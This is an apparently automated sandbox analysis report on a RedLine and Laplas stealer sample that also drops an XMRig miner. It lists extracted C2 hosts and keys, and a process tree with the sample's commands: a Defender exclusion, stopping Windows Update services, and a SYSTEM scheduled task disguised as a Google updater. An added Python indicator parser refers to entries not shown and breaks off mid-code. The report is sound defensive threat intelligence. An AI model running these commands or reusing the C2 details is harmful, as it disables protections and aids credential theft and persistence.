Analysis
  max time kernel: 281s
  max time network: 300s
  platform: windows7_x64
  resource: win7-20230220-en
  resource tags: arch:x64 arch:x86 image:win7-20230220-en locale:en-us os:windows7-x64 system
  submitted: 10-06-2023 04:48
Static task: static1
Behavioral task: behavioral1
  Sample: 8eb56a2f631dd8b6e3cf827e2022dd3714b805eb377d4e186a41384ec624376c.exe
  Resource: win7-20230220-en
Behavioral task: behavioral2
  Sample: 8eb56a2f631dd8b6e3cf827e2022dd3714b805eb377d4e186a41384ec624376c.exe
  Resource: win10-20230220-en
General
  Target: 8eb56a2f631dd8b6e3cf827e2022dd3714b805eb377d4e186a41384ec624376c.exe
  Size: 1.7MB
  MD5: a4aab901f5f4662d75a66bdb08971148
  SHA1: 9835bae8776e280b5a6bcf8e204d1bca5e05b0f6
  SHA256: 8eb56a2f631dd8b6e3cf827e2022dd3714b805eb377d4e186a41384ec624376c
  SHA512: a4a86338d24118d20242714da4ac9df72a0954c7c7cfa4be80cb2495b2ced651e328b4fbf1e66ac844f76f838efd591baade7b2dca019917964ac0b7a73c479f
  SSDEEP: 24576:YwJAcH22+6MA333QaUozWal46B7Owg/63wXByw/OK:bJAcH22KA3339UPaewgrByq
Malware Config
  Extracted: redline
    090623_11_red
    goodlogs.neverever.ug:11615
    auth_value: ca62706abf6895102883ab0c8a86ddff
  Extracted: laplas
    http://45.159.189.105
    api_key: f52a5c9bc5eb2f51b22f04f3e85c301ac0170a650de6044773f0a8309fbdfb79
Signatures

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.

Suspicious use of NtCreateUserProcessOtherParentProcess 11 IoCs
Processes:
  description           | pid  | process       | target process
  PID 436 created 1204  | 436  | mtaskhost.exe | Explorer.EXE   (×5)
  PID 1052 created 1204 | 1052 | updater.exe   | Explorer.EXE   (×6)
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 4 IoCs
Processes:
  description | ioc                                         | process
  Key opened  | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | updater.exe
  Key opened  | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | mtaskhost.exe
  Key opened  | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | cltaskhost.exe
  Key opened  | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | ntlhost.exe
XMRig Miner payload 4 IoCs
Processes:
  resource                                                                    | yara_rule
  behavioral1/memory/1052-173-0x000000013FD40000-0x0000000140B3B000-memory.dmp | xmrig
  behavioral1/memory/544-177-0x0000000140000000-0x00000001407EF000-memory.dmp  | xmrig
  behavioral1/memory/544-180-0x0000000140000000-0x00000001407EF000-memory.dmp  | xmrig
  behavioral1/memory/544-184-0x0000000140000000-0x00000001407EF000-memory.dmp  | xmrig
Downloads MZ/PE file
Drops file in Drivers directory 2 IoCs
Processes:
  description  | ioc                                   | process
  File created | C:\Windows\System32\drivers\etc\hosts | mtaskhost.exe
  File created | C:\Windows\System32\drivers\etc\hosts | updater.exe
Stops running service(s) 3 TTPs
Checks BIOS information in registry 2 TTPs 8 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
  description       | ioc                                                                 | process
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion     | cltaskhost.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion      | cltaskhost.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion     | ntlhost.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion      | ntlhost.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion     | updater.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion      | updater.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion     | mtaskhost.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion      | mtaskhost.exe
Executes dropped EXE 4 IoCs
Processes:
  pid  | process
  436  | mtaskhost.exe
  1644 | cltaskhost.exe
  1996 | ntlhost.exe
  1052 | updater.exe
Loads dropped DLL 4 IoCs
Processes:
  pid  | process
  1984 | jsc.exe        (×2)
  1644 | cltaskhost.exe
  1532 | taskeng.exe
Yara rule matched: themida
Processes:
  resource                                                                    | yara_rule
  \Users\Admin\AppData\Local\Temp\mtaskhost.exe                               | themida
  C:\Users\Admin\AppData\Local\Temp\mtaskhost.exe                             | themida
  behavioral1/memory/436-70-0x000000013FA70000-0x000000014086B000-memory.dmp  | themida
  behavioral1/memory/436-72-0x000000013FA70000-0x000000014086B000-memory.dmp  | themida
  behavioral1/memory/436-73-0x000000013FA70000-0x000000014086B000-memory.dmp  | themida
  behavioral1/memory/436-75-0x000000013FA70000-0x000000014086B000-memory.dmp  | themida
  behavioral1/memory/436-76-0x000000013FA70000-0x000000014086B000-memory.dmp  | themida
  behavioral1/memory/436-81-0x000000013FA70000-0x000000014086B000-memory.dmp  | themida
  behavioral1/memory/436-89-0x000000013FA70000-0x000000014086B000-memory.dmp  | themida
  behavioral1/memory/436-116-0x000000013FA70000-0x000000014086B000-memory.dmp | themida
  behavioral1/memory/436-119-0x000000013FA70000-0x000000014086B000-memory.dmp | themida
  behavioral1/memory/436-122-0x000000013FA70000-0x000000014086B000-memory.dmp | themida
  C:\Users\Admin\AppData\Local\Temp\mtaskhost.exe                             | themida
  behavioral1/memory/436-137-0x000000013FA70000-0x000000014086B000-memory.dmp | themida
  \Program Files\Google\Chrome\updater.exe                                    | themida
  C:\Program Files\Google\Chrome\updater.exe                                  | themida   (×2)
  behavioral1/memory/1052-142-0x000000013FD40000-0x0000000140B3B000-memory.dmp | themida
  behavioral1/memory/1052-143-0x000000013FD40000-0x0000000140B3B000-memory.dmp | themida
  behavioral1/memory/1052-144-0x000000013FD40000-0x0000000140B3B000-memory.dmp | themida
  behavioral1/memory/1052-145-0x000000013FD40000-0x0000000140B3B000-memory.dmp | themida
  behavioral1/memory/1052-146-0x000000013FD40000-0x0000000140B3B000-memory.dmp | themida
  behavioral1/memory/1052-147-0x000000013FD40000-0x0000000140B3B000-memory.dmp | themida
  behavioral1/memory/1052-148-0x000000013FD40000-0x0000000140B3B000-memory.dmp | themida
  behavioral1/memory/1052-150-0x000000013FD40000-0x0000000140B3B000-memory.dmp | themida
  behavioral1/memory/1052-154-0x000000013FD40000-0x0000000140B3B000-memory.dmp | themida
  behavioral1/memory/1052-161-0x000000013FD40000-0x0000000140B3B000-memory.dmp | themida
  behavioral1/memory/1052-167-0x000000013FD40000-0x0000000140B3B000-memory.dmp | themida
  C:\Program Files\Google\Chrome\updater.exe                                  | themida
  behavioral1/memory/1052-173-0x000000013FD40000-0x0000000140B3B000-memory.dmp | themida
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
  description     | ioc                                                                                                                                                                | process
  Set value (str) | \REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\Windows\CurrentVersion\Run\NTSystem = "C:\\Users\\Admin\\AppData\\Roaming\\NTSystem\\ntlhost.exe" | cltaskhost.exe
Checks whether UAC is enabled
Processes:
  description       | ioc                                                                           | process
  Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | updater.exe
  Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | mtaskhost.exe
  Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | cltaskhost.exe
  Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | ntlhost.exe
Drops file in System32 directory 4 IoCs
Processes:
  description                | ioc                                                                                                                        | process
  File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe   (×4)
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
Processes:
  pid  | process
  436  | mtaskhost.exe
  1644 | cltaskhost.exe
  1996 | ntlhost.exe
  1052 | updater.exe
Suspicious use of SetThreadContext 3 IoCs
Processes:
  description                          | pid  | process                                                               | target process
  PID 1344 set thread context of 1984  | 1344 | 8eb56a2f631dd8b6e3cf827e2022dd3714b805eb377d4e186a41384ec624376c.exe | jsc.exe
  PID 1052 set thread context of 1524  | 1052 | updater.exe                                                           | conhost.exe
  PID 1052 set thread context of 544   | 1052 | updater.exe                                                           | explorer.exe
Drops file in Program Files directory 2 IoCs
Processes:
  description  | ioc                                        | process
  File created | C:\Program Files\Google\Chrome\updater.exe | mtaskhost.exe
  File created | C:\Program Files\Google\Libs\WR64.sys      | updater.exe
Launches sc.exe 10 IoCs
Sc.exe is a Windows utility to control services on the system.
Processes:
  pid  | process
  1124 | sc.exe
  1628 | sc.exe
  1552 | sc.exe
  1384 | sc.exe
  792  | sc.exe
  1552 | sc.exe
  752  | sc.exe
  1944 | sc.exe
  980  | sc.exe
  852  | sc.exe
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
  pid  | process
  1364 | schtasks.exe
  1312 | schtasks.exe
GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
Processes:
  description            | flow | ioc
  HTTP User-Agent header | 9    | Go-http-client/1.1
Modifies data under HKEY_USERS 2 IoCs
Processes:
  description      | ioc                                                                                                              | process
  Key created      | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage                             | powershell.exe
  Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = f08fd10d579bd901 | powershell.exe
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
  pid  | process
  1984 | jsc.exe         (×2)
  436  | mtaskhost.exe   (×2)
  1740 | powershell.exe
  436  | mtaskhost.exe   (×6)
  1480 | powershell.exe
  436  | mtaskhost.exe   (×2)
  1052 | updater.exe     (×2)
  292  | powershell.exe
  1052 | updater.exe     (×6)
  2024 | powershell.exe
  1052 | updater.exe     (×4)
  544  | explorer.exe    (×36)
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
  pid | process
  464 |
Suspicious use of AdjustPrivilegeToken 16 IoCs
Processes:
  description                  | pid  | process
  Token: SeDebugPrivilege      | 1344 | 8eb56a2f631dd8b6e3cf827e2022dd3714b805eb377d4e186a41384ec624376c.exe
  Token: SeDebugPrivilege      | 1984 | jsc.exe
  Token: SeDebugPrivilege      | 1740 | powershell.exe
  Token: SeShutdownPrivilege   | 268  | powercfg.exe
  Token: SeDebugPrivilege      | 1480 | powershell.exe
  Token: SeShutdownPrivilege   | 1312 | schtasks.exe
  Token: SeShutdownPrivilege   | 300  | powercfg.exe
  Token: SeShutdownPrivilege   | 1984 | powercfg.exe
  Token: SeDebugPrivilege      | 292  | powershell.exe
  Token: SeShutdownPrivilege   | 996  | powercfg.exe
  Token: SeShutdownPrivilege   | 588  | powercfg.exe
  Token: SeShutdownPrivilege   | 1804 | powercfg.exe
  Token: SeDebugPrivilege      | 2024 | powershell.exe
  Token: SeShutdownPrivilege   | 1920 | powercfg.exe
  Token: SeDebugPrivilege      | 1052 | updater.exe
  Token: SeLockMemoryPrivilege | 544  | explorer.exe
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
  description                       | pid  | process                                                               | target process
  PID 1344 wrote to memory of 1984  | 1344 | 8eb56a2f631dd8b6e3cf827e2022dd3714b805eb377d4e186a41384ec624376c.exe | jsc.exe          (×9)
  PID 1984 wrote to memory of 436   | 1984 | jsc.exe                                                               | mtaskhost.exe    (×4)
  PID 1984 wrote to memory of 1644  | 1984 | jsc.exe                                                               | cltaskhost.exe   (×4)
  PID 1644 wrote to memory of 1996  | 1644 | cltaskhost.exe                                                        | ntlhost.exe      (×3)
  PID 1488 wrote to memory of 1628  | 1488 | cmd.exe                                                               | sc.exe           (×3)
  PID 1488 wrote to memory of 752   | 1488 | cmd.exe                                                               | sc.exe           (×3)
  PID 1488 wrote to memory of 1552  | 1488 | cmd.exe                                                               | sc.exe           (×3)
  PID 1488 wrote to memory of 1944  | 1488 | cmd.exe                                                               | sc.exe           (×3)
  PID 1488 wrote to memory of 1384  | 1488 | cmd.exe                                                               | sc.exe           (×3)
  PID 1408 wrote to memory of 268   | 1408 | cmd.exe                                                               | powercfg.exe     (×3)
  PID 1408 wrote to memory of 1312  | 1408 | cmd.exe                                                               | schtasks.exe     (×3)
  PID 1408 wrote to memory of 300   | 1408 | cmd.exe                                                               | powercfg.exe     (×3)
  PID 1480 wrote to memory of 1364  | 1480 | powershell.exe                                                        | schtasks.exe     (×3)
  PID 1408 wrote to memory of 1984  | 1408 | cmd.exe                                                               | powercfg.exe     (×3)
  PID 1532 wrote to memory of 1052  | 1532 | taskeng.exe                                                           | updater.exe      (×3)
  PID 1260 wrote to memory of 980   | 1260 | cmd.exe                                                               | sc.exe           (×3)
  PID 1260 wrote to memory of 792   | 1260 | cmd.exe                                                               | sc.exe           (×3)
  PID 1260 wrote to memory of 852   | 1260 | cmd.exe                                                               | sc.exe           (×3)
  PID 1260 wrote to memory of 1124  | 1260 | cmd.exe                                                               | sc.exe           (×2)
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
(each entry: depth, image path, command line, then the signatures triggered by that process)

1  C:\Windows\Explorer.EXE
   command: C:\Windows\Explorer.EXE
   2  C:\Users\Admin\AppData\Local\Temp\8eb56a2f631dd8b6e3cf827e2022dd3714b805eb377d4e186a41384ec624376c.exe
      command: "C:\Users\Admin\AppData\Local\Temp\8eb56a2f631dd8b6e3cf827e2022dd3714b805eb377d4e186a41384ec624376c.exe"
      - Suspicious use of SetThreadContext
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      3  C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
         command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
         - Loads dropped DLL
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of AdjustPrivilegeToken
         - Suspicious use of WriteProcessMemory
         4  C:\Users\Admin\AppData\Local\Temp\mtaskhost.exe
            command: "C:\Users\Admin\AppData\Local\Temp\mtaskhost.exe"
            - Suspicious use of NtCreateUserProcessOtherParentProcess
            - Identifies VirtualBox via ACPI registry values (likely anti-VM)
            - Drops file in Drivers directory
            - Checks BIOS information in registry
            - Executes dropped EXE
            - Checks whether UAC is enabled
            - Suspicious use of NtSetInformationThreadHideFromDebugger
            - Drops file in Program Files directory
            - Suspicious behavior: EnumeratesProcesses
         4  C:\Users\Admin\AppData\Local\Temp\cltaskhost.exe
            command: "C:\Users\Admin\AppData\Local\Temp\cltaskhost.exe"
            - Identifies VirtualBox via ACPI registry values (likely anti-VM)
            - Checks BIOS information in registry
            - Executes dropped EXE
            - Loads dropped DLL
            - Adds Run key to start application
            - Checks whether UAC is enabled
            - Suspicious use of NtSetInformationThreadHideFromDebugger
            - Suspicious use of WriteProcessMemory
            5  C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
               command: C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
               - Identifies VirtualBox via ACPI registry values (likely anti-VM)
               - Checks BIOS information in registry
               - Executes dropped EXE
               - Checks whether UAC is enabled
               - Suspicious use of NtSetInformationThreadHideFromDebugger
   2  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
      - Drops file in System32 directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
   2  C:\Windows\System32\cmd.exe
      command: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
      - Suspicious use of WriteProcessMemory
      3  C:\Windows\System32\sc.exe
         command: sc stop UsoSvc
         - Launches sc.exe
      3  C:\Windows\System32\sc.exe
         command: sc stop WaaSMedicSvc
         - Launches sc.exe
      3  C:\Windows\System32\sc.exe
         command: sc stop wuauserv
         - Launches sc.exe
      3  C:\Windows\System32\sc.exe
         command: sc stop bits
         - Launches sc.exe
      3  C:\Windows\System32\sc.exe
         command: sc stop dosvc
         - Launches sc.exe
   2  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#fyhjjuwy#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
      - Drops file in System32 directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      3  C:\Windows\system32\schtasks.exe
         command: "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
         - Creates scheduled task(s)
   2  C:\Windows\System32\cmd.exe
      command: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
      - Suspicious use of WriteProcessMemory
      3  C:\Windows\System32\powercfg.exe
         command: powercfg /x -hibernate-timeout-ac 0
         - Suspicious use of AdjustPrivilegeToken
      3  C:\Windows\System32\powercfg.exe
         command: powercfg /x -hibernate-timeout-dc 0
      3  C:\Windows\System32\powercfg.exe
         command: powercfg /x -standby-timeout-ac 0
         - Suspicious use of AdjustPrivilegeToken
      3  C:\Windows\System32\powercfg.exe
         command: powercfg /x -standby-timeout-dc 0
         - Suspicious use of AdjustPrivilegeToken
   2  C:\Windows\System32\schtasks.exe
      command: C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
   2  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
      - Drops file in System32 directory
      - Modifies data under HKEY_USERS
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
   2  C:\Windows\System32\cmd.exe
      command: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
      - Suspicious use of WriteProcessMemory
      3  C:\Windows\System32\sc.exe
         command: sc stop UsoSvc
         - Launches sc.exe
      3  C:\Windows\System32\sc.exe
         command: sc stop WaaSMedicSvc
         - Launches sc.exe
      3  C:\Windows\System32\sc.exe
         command: sc stop wuauserv
         - Launches sc.exe
      3  C:\Windows\System32\sc.exe
         command: sc stop bits
         - Launches sc.exe
      3  C:\Windows\System32\sc.exe
         command: sc stop dosvc
         - Launches sc.exe
   2  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#fyhjjuwy#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
      - Drops file in System32 directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      3  C:\Windows\system32\schtasks.exe
         command: "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
         - Creates scheduled task(s)
         - Suspicious use of AdjustPrivilegeToken
   2  C:\Windows\System32\cmd.exe
      command: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
   2  C:\Windows\System32\conhost.exe
      command: C:\Windows\System32\conhost.exe
   2  C:\Windows\explorer.exe
      command: C:\Windows\explorer.exe
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

1  C:\Windows\system32\taskeng.exe
   command: taskeng.exe {D5B2E0EA-07A8-42F0-9255-8439E5509F5E} S-1-5-18:NT AUTHORITY\System:Service:
   - Loads dropped DLL
   - Suspicious use of WriteProcessMemory
   2  C:\Program Files\Google\Chrome\updater.exe
      command: "C:\Program Files\Google\Chrome\updater.exe"
      - Suspicious use of NtCreateUserProcessOtherParentProcess
      - Identifies VirtualBox via ACPI registry values (likely anti-VM)
      - Drops file in Drivers directory
      - Checks BIOS information in registry
      - Executes dropped EXE
      - Checks whether UAC is enabled
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - Suspicious use of SetThreadContext
      - Drops file in Program Files directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

1  C:\Windows\System32\powercfg.exe
   command: powercfg /x -hibernate-timeout-ac 0
   - Suspicious use of AdjustPrivilegeToken

1  C:\Windows\System32\powercfg.exe
   command: powercfg /x -hibernate-timeout-dc 0
   - Suspicious use of AdjustPrivilegeToken

1  C:\Windows\System32\powercfg.exe
   command: powercfg /x -standby-timeout-dc 0
   - Suspicious use of AdjustPrivilegeToken

1  C:\Windows\System32\powercfg.exe
   command: powercfg /x -standby-timeout-ac 0
   - Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK Matrix ATT&CK v6
Downloads
14.0MB
-
memory/1052-173-0x000000013FD40000-0x0000000140B3B000-memory.dmpFilesize
14.0MB
-
memory/1052-154-0x000000013FD40000-0x0000000140B3B000-memory.dmpFilesize
14.0MB
-
memory/1052-161-0x000000013FD40000-0x0000000140B3B000-memory.dmpFilesize
14.0MB
-
memory/1344-56-0x000000001B440000-0x000000001B4B2000-memory.dmpFilesize
456KB
-
memory/1344-54-0x0000000000040000-0x00000000001F6000-memory.dmpFilesize
1.7MB
-
memory/1344-55-0x000000001AF80000-0x000000001B000000-memory.dmpFilesize
512KB
-
memory/1480-132-0x0000000002710000-0x0000000002790000-memory.dmpFilesize
512KB
-
memory/1480-133-0x0000000002710000-0x0000000002790000-memory.dmpFilesize
512KB
-
memory/1480-129-0x0000000002710000-0x0000000002790000-memory.dmpFilesize
512KB
-
memory/1480-130-0x000000001B0C0000-0x000000001B3A2000-memory.dmpFilesize
2.9MB
-
memory/1480-131-0x0000000002330000-0x0000000002338000-memory.dmpFilesize
32KB
-
memory/1480-128-0x0000000002710000-0x0000000002790000-memory.dmpFilesize
512KB
-
memory/1524-183-0x0000000140000000-0x000000014002A000-memory.dmpFilesize
168KB
-
memory/1524-176-0x0000000140000000-0x000000014002A000-memory.dmpFilesize
168KB
-
memory/1532-151-0x000000013FD40000-0x0000000140B3B000-memory.dmpFilesize
14.0MB
-
memory/1532-141-0x000000013FD40000-0x0000000140B3B000-memory.dmpFilesize
14.0MB
-
memory/1644-82-0x0000000001300000-0x0000000001AF8000-memory.dmpFilesize
8.0MB
-
memory/1644-83-0x0000000001300000-0x0000000001AF8000-memory.dmpFilesize
8.0MB
-
memory/1644-86-0x0000000001300000-0x0000000001AF8000-memory.dmpFilesize
8.0MB
-
memory/1644-91-0x0000000001300000-0x0000000001AF8000-memory.dmpFilesize
8.0MB
-
memory/1644-85-0x0000000001300000-0x0000000001AF8000-memory.dmpFilesize
8.0MB
-
memory/1644-84-0x0000000001300000-0x0000000001AF8000-memory.dmpFilesize
8.0MB
-
memory/1644-96-0x0000000001300000-0x0000000001AF8000-memory.dmpFilesize
8.0MB
-
memory/1644-87-0x0000000001300000-0x0000000001AF8000-memory.dmpFilesize
8.0MB
-
memory/1644-88-0x0000000001300000-0x0000000001AF8000-memory.dmpFilesize
8.0MB
-
memory/1740-110-0x0000000002740000-0x00000000027C0000-memory.dmpFilesize
512KB
-
memory/1740-112-0x0000000002420000-0x0000000002428000-memory.dmpFilesize
32KB
-
memory/1740-111-0x000000001B170000-0x000000001B452000-memory.dmpFilesize
2.9MB
-
memory/1740-114-0x0000000002740000-0x00000000027C0000-memory.dmpFilesize
512KB
-
memory/1740-113-0x0000000002740000-0x00000000027C0000-memory.dmpFilesize
512KB
-
memory/1984-61-0x0000000000400000-0x0000000000430000-memory.dmpFilesize
192KB
-
memory/1984-62-0x00000000003B0000-0x00000000003B6000-memory.dmpFilesize
24KB
-
memory/1984-63-0x0000000004900000-0x0000000004940000-memory.dmpFilesize
256KB
-
memory/1984-64-0x0000000004900000-0x0000000004940000-memory.dmpFilesize
256KB
-
memory/1984-71-0x0000000008920000-0x000000000971B000-memory.dmpFilesize
14.0MB
-
memory/1984-57-0x0000000000400000-0x0000000000430000-memory.dmpFilesize
192KB
-
memory/1984-59-0x0000000000400000-0x0000000000430000-memory.dmpFilesize
192KB
-
memory/1996-104-0x0000000000250000-0x0000000000A48000-memory.dmpFilesize
8.0MB
-
memory/1996-121-0x0000000000250000-0x0000000000A48000-memory.dmpFilesize
8.0MB
-
memory/1996-160-0x0000000000250000-0x0000000000A48000-memory.dmpFilesize
8.0MB
-
memory/1996-115-0x0000000000250000-0x0000000000A48000-memory.dmpFilesize
8.0MB
-
memory/1996-162-0x0000000000250000-0x0000000000A48000-memory.dmpFilesize
8.0MB
-
memory/1996-97-0x0000000000250000-0x0000000000A48000-memory.dmpFilesize
8.0MB
-
memory/1996-166-0x0000000000250000-0x0000000000A48000-memory.dmpFilesize
8.0MB
-
memory/1996-98-0x0000000000250000-0x0000000000A48000-memory.dmpFilesize
8.0MB
-
memory/1996-117-0x0000000000250000-0x0000000000A48000-memory.dmpFilesize
8.0MB
-
memory/1996-152-0x0000000000250000-0x0000000000A48000-memory.dmpFilesize
8.0MB
-
memory/1996-99-0x0000000000250000-0x0000000000A48000-memory.dmpFilesize
8.0MB
-
memory/1996-101-0x0000000000250000-0x0000000000A48000-memory.dmpFilesize
8.0MB
-
memory/1996-175-0x0000000000250000-0x0000000000A48000-memory.dmpFilesize
8.0MB
-
memory/1996-149-0x0000000000250000-0x0000000000A48000-memory.dmpFilesize
8.0MB
-
memory/1996-102-0x0000000000250000-0x0000000000A48000-memory.dmpFilesize
8.0MB
-
memory/1996-178-0x0000000000250000-0x0000000000A48000-memory.dmpFilesize
8.0MB
-
memory/1996-103-0x0000000000250000-0x0000000000A48000-memory.dmpFilesize
8.0MB
-
memory/1996-118-0x0000000000250000-0x0000000000A48000-memory.dmpFilesize
8.0MB
-
memory/1996-182-0x0000000000250000-0x0000000000A48000-memory.dmpFilesize
8.0MB
-
memory/1996-105-0x0000000000250000-0x0000000000A48000-memory.dmpFilesize
8.0MB
-
memory/1996-134-0x0000000000250000-0x0000000000A48000-memory.dmpFilesize
8.0MB
-
memory/2024-168-0x0000000000ED0000-0x0000000000F50000-memory.dmpFilesize
512KB
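The following is an added example and not part of the sandbox report: a small Python parser for the flattened dropped-file and memory-dump entries above, with the three checks an analyst wants to run before any of these hashes are lifted into a blocklist. The SAMPLE string is a constructed excerpt of a few entries from this page, copied in the fused form the extraction produced (the parser also accepts a "Label: value" layout). The checks flag, first, the \??\PIPE\srvsvc entry, whose MD5, SHA1, SHA256 and SHA512 are the digests of zero bytes, so it records a named pipe that was opened with no content captured and is not a usable indicator; second, updater.exe under \Program Files\Google\Chrome and mtaskhost.exe under the user's Temp directory, which share every digest and are therefore one 10.8MB binary written to two paths; and third, the memory dumps, which repeat the same address range for one PID under different snapshot indices, so they are deduplicated on the range in the file name and the rounded listed size is cross-checked against that range. The function names and the size-rounding tolerance are my own choices, not anything the report defines.

```python
"""Parse dropped-file digests and memory-dump entries out of a flattened sandbox
report and sanity-check them before they become indicators (added example)."""
import hashlib
import re
from collections import defaultdict

# Constructed excerpt of the report entries in the fused form the extraction
# produced (label glued onto the preceding field); "Label: value" also parses.
SAMPLE = r"""
\??\PIPE\srvsvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
-
\Program Files\Google\Chrome\updater.exeFilesize
10.8MB
MD56e39a59c8f6c3f52f122f80fb0933c9f
SHA25617f1d39417de8a58e1c64a84aa10499cc0462748a47d3e82f358f97ef536a671
-
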